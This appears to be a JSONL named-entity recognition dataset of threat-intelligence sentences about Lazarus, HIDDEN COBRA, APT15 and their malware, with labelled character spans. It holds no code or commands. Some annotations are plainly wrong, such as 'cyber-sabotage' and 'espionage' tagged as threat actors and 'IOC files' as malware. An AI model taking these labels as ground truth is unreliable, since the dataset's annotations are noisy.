{"text": "ther names for the group are Vixen Panda , Ke3chang , Royal APT , and Playful Dragon .", "spans": {"THREAT_ACTOR: group": [[19, 24]], "THREAT_ACTOR: Vixen Panda": [[29, 40]], "THREAT_ACTOR: Ke3chang": [[43, 51]], "THREAT_ACTOR: Royal APT": [[54, 63]], "THREAT_ACTOR: Playful Dragon": [[70, 84]]}, "info": {"id": "dnrti_train_000518", "source": "dnrti_train"}}
{"text": "There are many articles and researches online about APT15 and their activities , the most recent one by NCC Group .", "spans": {"THREAT_ACTOR: APT15": [[52, 57]], "ORGANIZATION: NCC Group": [[104, 113]]}, "info": {"id": "dnrti_train_000519", "source": "dnrti_train"}}
{"text": "There are many articles and researches online about APT15 and their activities , the most recent one by NCC Group ; although posted in March 2018 , it refers to a campaign in 2017 .", "spans": {"THREAT_ACTOR: APT15": [[52, 57]], "ORGANIZATION: NCC Group": [[104, 113]]}, "info": {"id": "dnrti_train_000520", "source": "dnrti_train"}}
{"text": "both attributed to Chinese government affiliated groups .", "spans": {}, "info": {"id": "dnrti_train_000521", "source": "dnrti_train"}}
{"text": "cyber actors of the North Korean to target the media , aerospace , financial , and critical infrastructure sectors in the United States and globally .", "spans": {"THREAT_ACTOR: cyber actors": [[0, 12]], "ORGANIZATION: critical infrastructure sectors": [[83, 114]]}, "info": {"id": "dnrti_train_000523", "source": "dnrti_train"}}
{"text": "Tools and capabilities used by HIDDEN COBRA actors include DDoS botnets , keyloggers , remote access tools ( RATs ) , and wiper malware .", "spans": {"THREAT_ACTOR: HIDDEN COBRA actors": [[31, 50]], "TOOL: DDoS botnets": [[59, 71]], "TOOL: keyloggers": [[74, 84]], "TOOL: remote access tools": [[87, 106]], "TOOL: RATs": [[109, 113]], "TOOL: wiper malware": [[122, 135]]}, "info": {"id": "dnrti_train_000525", "source": "dnrti_train"}}
{"text": "Variants of malware and tools used by HIDDEN COBRA actors include Destover and Hangman .", "spans": {"THREAT_ACTOR: HIDDEN COBRA actors": [[38, 57]], "TOOL: Destover": [[66, 74]], "TOOL: Hangman": [[79, 86]]}, "info": {"id": "dnrti_train_000526", "source": "dnrti_train"}}
{"text": "DHS has previously released Alert TA14-353A .", "spans": {"ORGANIZATION: DHS": [[0, 3]]}, "info": {"id": "dnrti_train_000527", "source": "dnrti_train"}}
{"text": "Our analysis shows that the cybercriminals behind the attack against an online casino in Central America , and several other targets in late-2017 , were most likely the infamous Lazarus hacking group .", "spans": {"THREAT_ACTOR: cybercriminals": [[28, 42]], "THREAT_ACTOR: Lazarus hacking group": [[178, 199]]}, "info": {"id": "dnrti_train_000529", "source": "dnrti_train"}}
{"text": "The Lazarus Group was first identified in Novetta 's report Operation Blockbuster in February 2016 .", "spans": {"THREAT_ACTOR: Lazarus Group": [[4, 17]], "ORGANIZATION: Novetta": [[42, 49]]}, "info": {"id": "dnrti_train_000530", "source": "dnrti_train"}}
{"text": "cyberattacks against high-value targets in Ukraine in December 2015 and December 2016 .", "spans": {}, "info": {"id": "dnrti_train_000531", "source": "dnrti_train"}}
{"text": "In all of these incidents , the Lazarus utilized similar toolsets , including KillDisk that was executed on compromised machines .", "spans": {"THREAT_ACTOR: Lazarus": [[32, 39]], "TOOL: KillDisk": [[78, 86]]}, "info": {"id": "dnrti_train_000532", "source": "dnrti_train"}}
{"text": "We are confident this KillDisk malware was deployed by Lazarus , rather than by another , unrelated attacker .", "spans": {"TOOL: KillDisk malware": [[22, 38]], "THREAT_ACTOR: Lazarus": [[55, 62]], "THREAT_ACTOR: attacker": [[100, 108]]}, "info": {"id": "dnrti_train_000533", "source": "dnrti_train"}}
{"text": "This recent attack against an online casino in Central America suggests that hacking tools from the Lazarus toolset are recompiled with every attack ( we didn't see these exact samples anywhere else ) .", "spans": {"THREAT_ACTOR: Lazarus": [[100, 107]]}, "info": {"id": "dnrti_train_000534", "source": "dnrti_train"}}
{"text": "Utilizing KillDisk in the attack scenario most likely served one of two purposes : the attackers covering their tracks after an espionage operation , or it was used directly for extortion or cyber-sabotage .", "spans": {"TOOL: KillDisk": [[10, 18]], "THREAT_ACTOR: attackers": [[87, 96]], "THREAT_ACTOR: cyber-sabotage": [[191, 205]]}, "info": {"id": "dnrti_train_000535", "source": "dnrti_train"}}
{"text": "Today we'd like to share some of our findings , and add something new to what 's currently common knowledge about Lazarus Group activities , and their connection to the much talked about February 2016 incident , when an unknown attacker attempted to steal up to $851M USD from Bangladesh Central Bank .", "spans": {"THREAT_ACTOR: attacker": [[228, 236]], "ORGANIZATION: Bangladesh Central Bank": [[277, 300]]}, "info": {"id": "dnrti_train_000536", "source": "dnrti_train"}}
{"text": "Since the Bangladesh incident there have been just a few articles explaining the connection between Lazarus Group and the Bangladesh bank heist .", "spans": {"THREAT_ACTOR: Lazarus Group": [[100, 113]]}, "info": {"id": "dnrti_train_000537", "source": "dnrti_train"}}
{"text": "However , from this it 's only clear that Lazarus might have attacked Polish banks .", "spans": {"THREAT_ACTOR: Lazarus": [[42, 49]]}, "info": {"id": "dnrti_train_000538", "source": "dnrti_train"}}
{"text": "Symantec also confirmed seeing the Lazarus wiper tool in Poland at one of their customers .", "spans": {"ORGANIZATION: Symantec": [[0, 8]], "THREAT_ACTOR: Lazarus": [[35, 42]], "ORGANIZATION: customers": [[80, 89]]}, "info": {"id": "dnrti_train_000539", "source": "dnrti_train"}}
{"text": "Considering that the afterhack publications by the media mentioned that the investigation stumbled upon three different attackers , it was not obvious whether Lazarus was the one responsible for the fraudulent SWIFT transactions , or if Lazarus had in fact developed its own malware to attack banks ' systems .", "spans": {"THREAT_ACTOR: attackers": [[120, 129]], "THREAT_ACTOR: Lazarus": [[159, 166], [237, 244]]}, "info": {"id": "dnrti_train_000540", "source": "dnrti_train"}}
{"text": "We would like to add some strong facts that link some attacks on banks to Lazarus , and share some of our own findings as well as shed some light on the recent TTPs used by the attacker , including some yet unpublished details from the attack in Europe in 2017 .", "spans": {"THREAT_ACTOR: Lazarus": [[74, 81]], "THREAT_ACTOR: attacker": [[177, 185]]}, "info": {"id": "dnrti_train_000541", "source": "dnrti_train"}}
{"text": "Lazarus attacks are not a local problem and clearly the group 's operations span across the whole world .", "spans": {"THREAT_ACTOR: group": [[56, 61]]}, "info": {"id": "dnrti_train_000542", "source": "dnrti_train"}}
{"text": "Lazarus was previously known to conduct cyberespionage and cybersabotage activities , such as attacks on Sony Pictures Entertainment with volumes of internal data leaked , and many system harddrives in the company wiped .", "spans": {"THREAT_ACTOR: Lazarus": [[0, 7]], "ORGANIZATION: Sony Pictures Entertainment": [[105, 132]]}, "info": {"id": "dnrti_train_000543", "source": "dnrti_train"}}
{"text": "We believe that Lazarus Group is very large and works mainly on infiltration and espionage operations , while a substantially smaller units within the group , which we have dubbed Bluenoroff , is responsible for financial profit .", "spans": {"THREAT_ACTOR: Lazarus Group": [[16, 29]], "THREAT_ACTOR: group": [[151, 156]], "THREAT_ACTOR: Bluenoroff": [[180, 190]]}, "info": {"id": "dnrti_train_000544", "source": "dnrti_train"}}
{"text": "Lazarus regrouped and rushed into new countries , selecting mostly poorer and less developed locations , hitting smaller banks because they are , apparently , easy prey .", "spans": {"THREAT_ACTOR: Lazarus": [[0, 7]]}, "info": {"id": "dnrti_train_000545", "source": "dnrti_train"}}
{"text": "To date , the Lazarus group has been one of the most successful in launching large scale operations against the financial industry .", "spans": {"THREAT_ACTOR: Lazarus group": [[14, 27]]}, "info": {"id": "dnrti_train_000546", "source": "dnrti_train"}}
{"text": "We believe that Lazarus will remain one of the biggest threats to the banking sector , finance , and trading companies , as well as casinos for the next few years .", "spans": {"THREAT_ACTOR: Lazarus": [[16, 23]], "ORGANIZATION: banking sector": [[70, 84]], "ORGANIZATION: trading companies": [[101, 118]], "ORGANIZATION: casinos": [[132, 139]]}, "info": {"id": "dnrti_train_000547", "source": "dnrti_train"}}
{"text": "We believe Lazarus started this watering hole attack at the end of 2016 after their other operation was interrupted in South East Asia .", "spans": {"THREAT_ACTOR: Lazarus": [[11, 18]]}, "info": {"id": "dnrti_train_000548", "source": "dnrti_train"}}
{"text": "We believe they started this watering hole campaign at the end of 2016 after their other operation was interrupted in South East Asia .", "spans": {}, "info": {"id": "dnrti_train_000549", "source": "dnrti_train"}}
{"text": "A rudimentary but somewhat clever design , KiloAlfa provides keylogging capability for the Lazarus Group 's collection of malicious tools .", "spans": {"TOOL: KiloAlfa": [[43, 51]], "THREAT_ACTOR: Lazarus Group": [[91, 104]]}, "info": {"id": "dnrti_train_000550", "source": "dnrti_train"}}
{"text": "The design of KiloAlfa is broken down into two basic components : the persistence functionality and the keylogging functionality .", "spans": {"TOOL: KiloAlfa": [[14, 22]], "TOOL: keylogging functionality": [[104, 128]]}, "info": {"id": "dnrti_train_000551", "source": "dnrti_train"}}
{"text": "The persistence functionality of KiloAlfa allows the malware to self-install on a victim 's machine when activated ( described below ) .", "spans": {"TOOL: KiloAlfa": [[33, 41]]}, "info": {"id": "dnrti_train_000552", "source": "dnrti_train"}}
{"text": "Evidence suggest that the Lazarus Group uses compromised infrastructure as the public-facing touchpoint for the majority of their malware samples .", "spans": {"THREAT_ACTOR: Lazarus Group": [[26, 39]], "TOOL: compromised infrastructure": [[45, 71]]}, "info": {"id": "dnrti_train_000553", "source": "dnrti_train"}}
{"text": "PapaAlfa is believed to be one of the proxy malware components that the Lazarus Group uses to hide the true command and control server ( s ) for operations .", "spans": {"TOOL: PapaAlfa": [[0, 8]], "THREAT_ACTOR: Lazarus Group": [[72, 85]]}, "info": {"id": "dnrti_train_000554", "source": "dnrti_train"}}
{"text": "Rather , PapaAlfa could be considered a smart proxy due in part to the fact that the Lazarus can easily switch the backend destination address and port without having to reestablish control over the infected machine hosting the PapaAlfa malware .", "spans": {"TOOL: PapaAlfa": [[9, 17]], "THREAT_ACTOR: Lazarus": [[85, 92]], "TOOL: PapaAlfa malware": [[228, 244]]}, "info": {"id": "dnrti_train_000555", "source": "dnrti_train"}}
{"text": "In terms of form factor , PapaAlfa comes in two flavors : service DLL and standalone executable .", "spans": {"TOOL: PapaAlfa": [[26, 34]], "TOOL: service DLL": [[58, 69]], "TOOL: standalone executable": [[74, 95]]}, "info": {"id": "dnrti_train_000556", "source": "dnrti_train"}}
{"text": "The IndiaBravo-PapaAlfa installer is responsible for installing the service DLL variant .", "spans": {"TOOL: IndiaBravo-PapaAlfa installer": [[4, 33]]}, "info": {"id": "dnrti_train_000557", "source": "dnrti_train"}}
{"text": "While the tools profiled in this report are not inherently malicious , their capabilities are nonetheless integral to the Lazarus Group 's cyber operations , both espionage and destructive in nature , making them inherently dangerous to potential victims .", "spans": {"THREAT_ACTOR: Lazarus Group": [[122, 135]], "THREAT_ACTOR: espionage": [[163, 172]]}, "info": {"id": "dnrti_train_000558", "source": "dnrti_train"}}
{"text": "These tools often lay the groundwork for further malicious activity , such as the targeting of antivirus capabilities and the disabling of firewalls , both of which are very fundamental defensive measures .", "spans": {}, "info": {"id": "dnrti_train_000559", "source": "dnrti_train"}}
{"text": "Furthermore , like many other identified Lazarus Group families , these tools showcase the group 's creative solutions , such as the PapaAlfa , which makes it difficult to immediately identify potentially malicious activity on a compromised network .", "spans": {"THREAT_ACTOR: Lazarus Group": [[41, 54]], "THREAT_ACTOR: group": [[91, 96]], "TOOL: PapaAlfa": [[133, 141]]}, "info": {"id": "dnrti_train_000560", "source": "dnrti_train"}}
{"text": "The first class , colloquially known as \" wipers \" , are a class of malware has the primary intent of destroying data on a victim 's machine .", "spans": {"TOOL: wipers": [[42, 48]]}, "info": {"id": "dnrti_train_000561", "source": "dnrti_train"}}
{"text": "DDoS malware floods a target 's network-connected service with an excessive number of request at once in order to overload the capacity of the server .", "spans": {"TOOL: DDoS malware": [[0, 12]]}, "info": {"id": "dnrti_train_000562", "source": "dnrti_train"}}
{"text": "For example , DeltaAlfa specifies a DDoS bot family identified as Alfa .", "spans": {"MALWARE: DeltaAlfa": [[14, 23]], "TOOL: DDoS bot": [[36, 44]]}, "info": {"id": "dnrti_train_000563", "source": "dnrti_train"}}
{"text": "The naming scheme used by Novetta for the malware identified during Operation Blockbuster consists of at least two identifiers which each identifier coming from the International Civil Aviation Organization ( ICAO ) 's phonetic alphabet ,2 commonly referred to as the NATO phonetic alphabet .", "spans": {"ORGANIZATION: Novetta": [[26, 33]], "ORGANIZATION: International Civil Aviation Organization": [[165, 206]]}, "info": {"id": "dnrti_train_000564", "source": "dnrti_train"}}
{"text": "Loaders are typically responsible for loading a DLL component into memory given that a DLL cannot operate in a standalone mode such as an executable .", "spans": {}, "info": {"id": "dnrti_train_000565", "source": "dnrti_train"}}
{"text": "This report will explore the various installers , uninstallers and loaders Novetta has observed the Lazarus Group using .", "spans": {"TOOL: installers": [[37, 47]], "TOOL: uninstallers": [[50, 62]], "ORGANIZATION: Novetta": [[75, 82]], "THREAT_ACTOR: Lazarus Group": [[100, 113]]}, "info": {"id": "dnrti_train_000566", "source": "dnrti_train"}}
{"text": "This reverse engineering report looks at the RATs and staging malware found within the Lazarus Group 's collection .", "spans": {"TOOL: RATs": [[45, 49]], "TOOL: staging malware": [[54, 69]], "THREAT_ACTOR: Lazarus Group": [[87, 100]]}, "info": {"id": "dnrti_train_000567", "source": "dnrti_train"}}
{"text": "Regardless of their sophistication or refinement , the malware families within the Lazarus Group 's India and Lima classes perform at a reasonable level for their designed purpose : the introduction and persistence of malware from the Lazarus Group on a victim 's infrastructure .", "spans": {"THREAT_ACTOR: Lazarus Group": [[83, 96], [235, 248]]}, "info": {"id": "dnrti_train_000568", "source": "dnrti_train"}}
{"text": "While the capabilities for the installers , loaders , and uninstallers in this report are relatively straight forward and single-focused , analysis of these malware families provide further insight into the capabilities of the Lazarus Group .", "spans": {"TOOL: installers": [[31, 41]], "TOOL: loaders": [[44, 51]], "TOOL: uninstallers": [[58, 70]], "THREAT_ACTOR: Lazarus Group": [[227, 240]]}, "info": {"id": "dnrti_train_000569", "source": "dnrti_train"}}
{"text": "The Lazarus Group employs a variety of RATs that operate in both client mode and server mode .", "spans": {"THREAT_ACTOR: Lazarus Group": [[4, 17]], "TOOL: RATs": [[39, 43]]}, "info": {"id": "dnrti_train_000570", "source": "dnrti_train"}}
{"text": "The most common communication mode for a RAT is to act as a client to a remote server .", "spans": {"TOOL: RAT": [[41, 44]]}, "info": {"id": "dnrti_train_000571", "source": "dnrti_train"}}
{"text": "The Lazarus Group employs a variety of RATs and staging malware to conduct cyber operations , many of which contain significant code overlap that points to at least a shared development environment .", "spans": {"THREAT_ACTOR: Lazarus Group": [[4, 17]], "TOOL: RATs": [[39, 43]], "TOOL: staging malware": [[48, 63]]}, "info": {"id": "dnrti_train_000572", "source": "dnrti_train"}}
{"text": "While some members within the Romeo and Sierra groups may not implement sound authentication strategies , shift their design focus in abrupt and unusual manners , and fail to understand the pitfalls of distributed command networks , on the whole the families within the Lazarus Group 's collection of RATs and staging malware perform their tasks with surprising effectiveness .", "spans": {"THREAT_ACTOR: Romeo": [[30, 35]], "THREAT_ACTOR: Sierra groups": [[40, 53]], "THREAT_ACTOR: Lazarus Group": [[270, 283]], "TOOL: RATs": [[301, 305]], "TOOL: staging malware": [[310, 325]]}, "info": {"id": "dnrti_train_000573", "source": "dnrti_train"}}
{"text": "McAfee Advanced Threat Research analysts have discovered an aggressive Bitcoin-stealing phishing campaign by the international cybercrime group Lazarus that uses sophisticated malware with long-term impact .", "spans": {"ORGANIZATION: McAfee Advanced Threat Research": [[0, 31]], "THREAT_ACTOR: cybercrime group": [[127, 143]], "THREAT_ACTOR: Lazarus": [[144, 151]], "TOOL: sophisticated malware": [[162, 183]]}, "info": {"id": "dnrti_train_000576", "source": "dnrti_train"}}
{"text": "McAfee Advanced Threat Research ( ATR ) analysts have discovered an aggressive Bitcoin-stealing phishing campaign by the international cybercrime group Lazarus that uses sophisticated malware with long-term impact .", "spans": {"ORGANIZATION: McAfee Advanced Threat Research": [[0, 31]], "ORGANIZATION: ATR": [[34, 37]], "THREAT_ACTOR: cybercrime group": [[135, 151]], "THREAT_ACTOR: Lazarus": [[152, 159]], "TOOL: sophisticated malware": [[170, 191]]}, "info": {"id": "dnrti_train_000577", "source": "dnrti_train"}}
{"text": "The use of decoy documents also reveals some of the potential targets of the Lazarus group 's malicious activity , specifically the use spear phishing attacks observed targeting South Korean government and aerospace organizations .", "spans": {"TOOL: decoy documents": [[11, 26]], "THREAT_ACTOR: Lazarus group": [[77, 90]], "ORGANIZATION: aerospace organizations": [[206, 229]]}, "info": {"id": "dnrti_train_000579", "source": "dnrti_train"}}
{"text": "The campaign lasted from April to October and used job descriptions relevant to target organizations , in both English and Korean language .", "spans": {}, "info": {"id": "dnrti_train_000580", "source": "dnrti_train"}}
{"text": "The Lazarus Group 's objective was to gain access to the target 's environment and obtain key military program insight or steal money .", "spans": {"THREAT_ACTOR: Lazarus Group": [[4, 17]]}, "info": {"id": "dnrti_train_000581", "source": "dnrti_train"}}
{"text": "In this latest discovery by McAfee , despite a short pause in similar operations , the Lazarus group targets financial organizations .", "spans": {"ORGANIZATION: McAfee": [[28, 34]], "THREAT_ACTOR: Lazarus group": [[87, 100]], "ORGANIZATION: financial organizations": [[109, 132]]}, "info": {"id": "dnrti_train_000582", "source": "dnrti_train"}}
{"text": "This campaign is tailored to identifying those who are running Bitcoin related software through specific system scans .", "spans": {}, "info": {"id": "dnrti_train_000583", "source": "dnrti_train"}}
{"text": "This Malware Analysis Report ( MAR ) is the result of analytic efforts between the Department of Homeland Security ( DHS ) and the Federal Bureau of Investigation ( FBI ) .", "spans": {"ORGANIZATION: Department of Homeland Security": [[83, 114]], "ORGANIZATION: DHS": [[117, 120]], "ORGANIZATION: FBI": [[165, 168]]}, "info": {"id": "dnrti_train_000584", "source": "dnrti_train"}}
{"text": "When victims open malicious documents attached to the emails , the malware scans for Bitcoin activity and then establishes an implant for long-term data-gathering .", "spans": {}, "info": {"id": "dnrti_train_000585", "source": "dnrti_train"}}
{"text": "According to trusted third-party reporting , HIDDEN COBRA actors have likely been using FALLCHILL malware since 2016 to target the aerospace , telecommunications , and finance industries .", "spans": {"THREAT_ACTOR: HIDDEN COBRA actors": [[45, 64]], "TOOL: FALLCHILL malware": [[88, 105]]}, "info": {"id": "dnrti_train_000586", "source": "dnrti_train"}}
{"text": "The malware is a fully functional RAT with multiple commands that the actors can issue from a command and control ( C2 ) server to a victim 's system via dual proxies .", "spans": {"TOOL: RAT": [[34, 37]], "THREAT_ACTOR: actors": [[70, 76]]}, "info": {"id": "dnrti_train_000587", "source": "dnrti_train"}}
{"text": "FALLCHILL typically infects a system as a file dropped by other HIDDEN COBRA malware or as a file downloaded unknowingly by users when visiting sites compromised by HIDDEN COBRA actors .", "spans": {"TOOL: FALLCHILL": [[0, 9]], "TOOL: HIDDEN COBRA malware": [[64, 84]], "THREAT_ACTOR: HIDDEN COBRA actors": [[165, 184]]}, "info": {"id": "dnrti_train_000588", "source": "dnrti_train"}}
{"text": "HIDDEN COBRA actors use an external tool or dropper to install the FALLCHILL malware to establish persistence .", "spans": {"THREAT_ACTOR: HIDDEN COBRA actors": [[0, 19]], "TOOL: external tool": [[27, 40]], "TOOL: dropper": [[44, 51]], "TOOL: FALLCHILL malware": [[67, 84]]}, "info": {"id": "dnrti_train_000589", "source": "dnrti_train"}}
{"text": "HIDDEN COBRA actors install the FALLCHILL malware to establish persistence .", "spans": {"THREAT_ACTOR: HIDDEN COBRA actors": [[0, 19]], "TOOL: FALLCHILL malware": [[32, 49]]}, "info": {"id": "dnrti_train_000590", "source": "dnrti_train"}}
{"text": "Working with U.S. government partners , DHS and FBI identified Internet Protocol ( IP ) addresses and other indicators of compromise ( IOCs ) associated with a remote administration tool ( RAT ) used by the North Korean government—commonly known as FALLCHILL .", "spans": {"ORGANIZATION: DHS": [[40, 43]], "ORGANIZATION: FBI": [[48, 51]], "TOOL: remote administration tool": [[160, 186]], "TOOL: RAT": [[189, 192]], "TOOL: FALLCHILL": [[249, 258]]}, "info": {"id": "dnrti_train_000591", "source": "dnrti_train"}}
{"text": "This alert 's IOC files provide HIDDEN COBRA indicators related to FALLCHILL .", "spans": {"MALWARE: IOC files": [[14, 23]], "THREAT_ACTOR: HIDDEN COBRA": [[32, 44]], "TOOL: FALLCHILL": [[67, 76]]}, "info": {"id": "dnrti_train_000592", "source": "dnrti_train"}}
{"text": "McAfee Advanced Threat Research analysts have uncovered a global data reconnaissance campaign assaulting a wide number of industries including critical infrastructure , entertainment , finance , health care , and telecommunications .", "spans": {"ORGANIZATION: McAfee Advanced Threat Research": [[0, 31]]}, "info": {"id": "dnrti_train_000593", "source": "dnrti_train"}}
{"text": "Because of this , additional HIDDEN COBRA malware may be present on systems compromised with FALLCHILL .", "spans": {"TOOL: HIDDEN COBRA malware": [[29, 49]], "TOOL: FALLCHILL": [[93, 102]]}, "info": {"id": "dnrti_train_000594", "source": "dnrti_train"}}
{"text": "This campaign , dubbed Operation GhostSecret , leverages multiple implants , tools , and malware variants associated with the state-sponsored cyber group HIDDEN COBRA .", "spans": {"THREAT_ACTOR: cyber group": [[142, 153]], "THREAT_ACTOR: HIDDEN COBRA": [[154, 166]]}, "info": {"id": "dnrti_train_000595", "source": "dnrti_train"}}
{"text": "From March 18 to 26 we observed the malware operating in multiple areas of the world .", "spans": {}, "info": {"id": "dnrti_train_000596", "source": "dnrti_train"}}
{"text": "Furthermore , the Advanced Threat Research team has discovered Proxysvc , which appears to be an undocumented implant .", "spans": {"ORGANIZATION: Advanced Threat Research": [[18, 42]], "TOOL: Proxysvc": [[63, 71]]}, "info": {"id": "dnrti_train_000597", "source": "dnrti_train"}}
{"text": "Our investigation into this campaign reveals that the actor used multiple malware implants , including an unknown implant with capabilities similar to Bankshot .", "spans": {"THREAT_ACTOR: actor": [[54, 59]], "TOOL: Bankshot": [[151, 159]]}, "info": {"id": "dnrti_train_000598", "source": "dnrti_train"}}
{"text": "The attackers behind Operation GhostSecret used a similar infrastructure to earlier threats , including SSL certificates used by FakeTLS in implants found in the Destover backdoor variant known as Escad , which was used in the Sony Pictures attack .", "spans": {"THREAT_ACTOR: attackers": [[4, 13]], "TOOL: SSL certificates": [[104, 120]], "TOOL: FakeTLS": [[129, 136]], "TOOL: Destover backdoor": [[162, 179]], "TOOL: Escad": [[197, 202]]}, "info": {"id": "dnrti_train_000599", "source": "dnrti_train"}}
{"text": "Based on our analysis of public and private information from submissions , along with product telemetry , it appears Proxysvc was used alongside the 2017 Destover variant and has operated undetected since mid-2017 .", "spans": {"TOOL: Proxysvc": [[117, 125]], "TOOL: Destover": [[154, 162]]}, "info": {"id": "dnrti_train_000600", "source": "dnrti_train"}}
{"text": "This new variant resembles parts of the Destover malware , which was used in the 2014 Sony Pictures attack .", "spans": {"TOOL: Destover malware": [[40, 56]]}, "info": {"id": "dnrti_train_000601", "source": "dnrti_train"}}
{"text": "The Lazarus used a similar infrastructure to earlier threats , including the Destover backdoor variant known as Escad .", "spans": {"THREAT_ACTOR: Lazarus": [[4, 11]], "TOOL: Destover backdoor": [[77, 94]], "TOOL: Escad": [[112, 117]]}, "info": {"id": "dnrti_train_000602", "source": "dnrti_train"}}
{"text": "The McAfee Advanced Threat Research team discovered a previously unknown data-gathering implant that surfaced in mid-February 2018 .", "spans": {"ORGANIZATION: McAfee Advanced Threat Research": [[4, 35]], "MALWARE: data-gathering implant": [[73, 95]]}, "info": {"id": "dnrti_train_000603", "source": "dnrti_train"}}
{"text": "The Advanced Threat Research team uncovered activity related to this campaign in March 2018 , when the actors targeted Turkish banks .", "spans": {"ORGANIZATION: Advanced Threat Research": [[4, 28]], "THREAT_ACTOR: actors": [[103, 109]]}, "info": {"id": "dnrti_train_000604", "source": "dnrti_train"}}
{"text": "Lazarus used watering hole attacks to compromise legitimate and trusted websites frequently visited by their targets .", "spans": {"THREAT_ACTOR: Lazarus": [[0, 7]]}, "info": {"id": "dnrti_train_000605", "source": "dnrti_train"}}
{"text": "Malefactors used watering hole attacks to compromise legitimate and trusted websites frequently visited by their targets .", "spans": {"THREAT_ACTOR: Malefactors": [[0, 11]]}, "info": {"id": "dnrti_train_000606", "source": "dnrti_train"}}
{"text": "Feedback from our Smart Protection Network revealed that apart from attacks in North America ( mainly the U.S. ) , Europe , and South America , the campaign also noticeably affected enterprises in Taiwan , Hong Kong , China , and Bahrain .", "spans": {"ORGANIZATION: Smart Protection Network": [[18, 42]]}, "info": {"id": "dnrti_train_000607", "source": "dnrti_train"}}
{"text": "On February 28 , the McAfee discovered that the cybercrime group HIDDEN COBRA continues to target cryptocurrency and financial organizations .", "spans": {"ORGANIZATION: McAfee": [[21, 27]], "THREAT_ACTOR: cybercrime group": [[48, 64]], "THREAT_ACTOR: HIDDEN COBRA": [[65, 77]], "ORGANIZATION: financial organizations": [[117, 140]]}, "info": {"id": "dnrti_train_000608", "source": "dnrti_train"}}
{"text": "On February 28 , the McAfee Advanced Threat Research team discovered that the cybercrime group HIDDEN COBRA continues to target cryptocurrency and financial organizations .", "spans": {"ORGANIZATION: McAfee Advanced Threat Research": [[21, 52]], "THREAT_ACTOR: cybercrime group": [[78, 94]], "THREAT_ACTOR: HIDDEN COBRA": [[95, 107]], "ORGANIZATION: financial organizations": [[147, 170]]}, "info": {"id": "dnrti_train_000609", "source": "dnrti_train"}}
{"text": "While the URL acts similarly to how eye-watch.in : 443 delivers payloads , we also saw the URL leveraging and exploiting security flaws in Flash : CVE-2015-8651 , CVE-2016-1019 , and CVE-2016-4117 .", "spans": {"VULNERABILITY: CVE-2015-8651": [[147, 160]], "VULNERABILITY: CVE-2016-1019": [[163, 176]], "VULNERABILITY: CVE-2016-4117": [[183, 196]]}, "info": {"id": "dnrti_train_000610", "source": "dnrti_train"}}
{"text": "In this analysis , we observed the return of HIDDEN COBRA 's Bankshot malware implant surfacing in the Turkish financial system .", "spans": {"THREAT_ACTOR: HIDDEN COBRA": [[45, 57]], "TOOL: Bankshot malware": [[61, 77]]}, "info": {"id": "dnrti_train_000611", "source": "dnrti_train"}}
{"text": "In this new , aggressive campaign we see a return of the Bankshot implant , which last appeared in 2017 .", "spans": {"TOOL: Bankshot": [[57, 65]]}, "info": {"id": "dnrti_train_000612", "source": "dnrti_train"}}
{"text": "This attack resembles previous attacks by HIDDEN COBRA conducted against the SWIFT .", "spans": {"THREAT_ACTOR: HIDDEN COBRA": [[42, 54]]}, "info": {"id": "dnrti_train_000613", "source": "dnrti_train"}}
{"text": "The exploit , which takes advantage of CVE-2018-4878 , allows an attacker to execute arbitrary code such as an implant .", "spans": {"VULNERABILITY: CVE-2018-4878": [[39, 52]], "THREAT_ACTOR: attacker": [[65, 73]]}, "info": {"id": "dnrti_train_000614", "source": "dnrti_train"}}
{"text": "These implants are variations of earlier forms of Bankshot , a remote access tool that gives an attacker full capability on a victim 's system .", "spans": {"TOOL: Bankshot": [[50, 58]], "THREAT_ACTOR: attacker": [[96, 104]]}, "info": {"id": "dnrti_train_000615", "source": "dnrti_train"}}
{"text": "Bankshot was first reported by the Department of Homeland Security on December 13 , 2017 , and has only recently resurfaced in newly compiled variants .", "spans": {"TOOL: Bankshot": [[0, 8]], "ORGANIZATION: Department of Homeland Security": [[35, 66]]}, "info": {"id": "dnrti_train_000616", "source": "dnrti_train"}}
{"text": "We have found what may be an early data-gathering stage for future possible heists from financial organizations in Turkey ( and possibly other countries ) .", "spans": {"ORGANIZATION: financial organizations": [[88, 111]]}, "info": {"id": "dnrti_train_000617", "source": "dnrti_train"}}
{"text": "This malware report contains analysis of one 32-bit Windows executable file , identified as a Remote Access Trojan ( RAT ) .", "spans": {"MALWARE: 32-bit Windows executable file": [[45, 75]], "TOOL: Remote Access Trojan": [[94, 114]], "TOOL: RAT": [[117, 120]]}, "info": {"id": "dnrti_train_000619", "source": "dnrti_train"}}
{"text": "This malware is capable of accessing device configuration data , downloading additional files , executing commands , modifying the registry , capturing screen shots , and exfiltrating data .", "spans": {}, "info": {"id": "dnrti_train_000620", "source": "dnrti_train"}}
{"text": "Volgmer is a backdoor Trojan designed to provide covert access to a compromised system .", "spans": {"TOOL: Volgmer": [[0, 7]], "TOOL: backdoor Trojan": [[13, 28]]}, "info": {"id": "dnrti_train_000621", "source": "dnrti_train"}}
{"text": "It is suspected that spear phishing is the primary delivery mechanism for Volgmer infections ; however , HIDDEN COBRA actors use a suite of custom tools , some of which could also be used to initially compromise a system .", "spans": {"TOOL: Volgmer": [[74, 81]], "THREAT_ACTOR: HIDDEN COBRA actors": [[105, 124]], "TOOL: custom tools": [[140, 152]]}, "info": {"id": "dnrti_train_000622", "source": "dnrti_train"}}
{"text": "Since at least 2013 , HIDDEN COBRA actors have been observed using Volgmer malware in the wild to target the government , financial , automotive , and media industries .", "spans": {"THREAT_ACTOR: HIDDEN COBRA actors": [[22, 41]], "TOOL: Volgmer malware": [[67, 82]]}, "info": {"id": "dnrti_train_000623", "source": "dnrti_train"}}
{"text": "As a backdoor Trojan , Volgmer has several capabilities including : gathering system information , updating service registry keys , downloading and uploading files , executing commands , terminating processes , and listing directories .", "spans": {"TOOL: backdoor Trojan": [[5, 20]], "TOOL: Volgmer": [[23, 30]]}, "info": {"id": "dnrti_train_000625", "source": "dnrti_train"}}
{"text": "In one of the samples received for analysis , the US-CERT Code Analysis Team observed botnet controller functionality .", "spans": {"ORGANIZATION: US-CERT Code Analysis Team": [[50, 76]], "MALWARE: botnet controller": [[86, 103]]}, "info": {"id": "dnrti_train_000626", "source": "dnrti_train"}}
{"text": "Volgmer payloads have been observed in 32-bit form as either executables or dynamic-link library ( .dll )", "spans": {"TOOL: Volgmer": [[0, 7]], "MALWARE: .dll": [[99, 103]]}, "info": {"id": "dnrti_train_000627", "source": "dnrti_train"}}
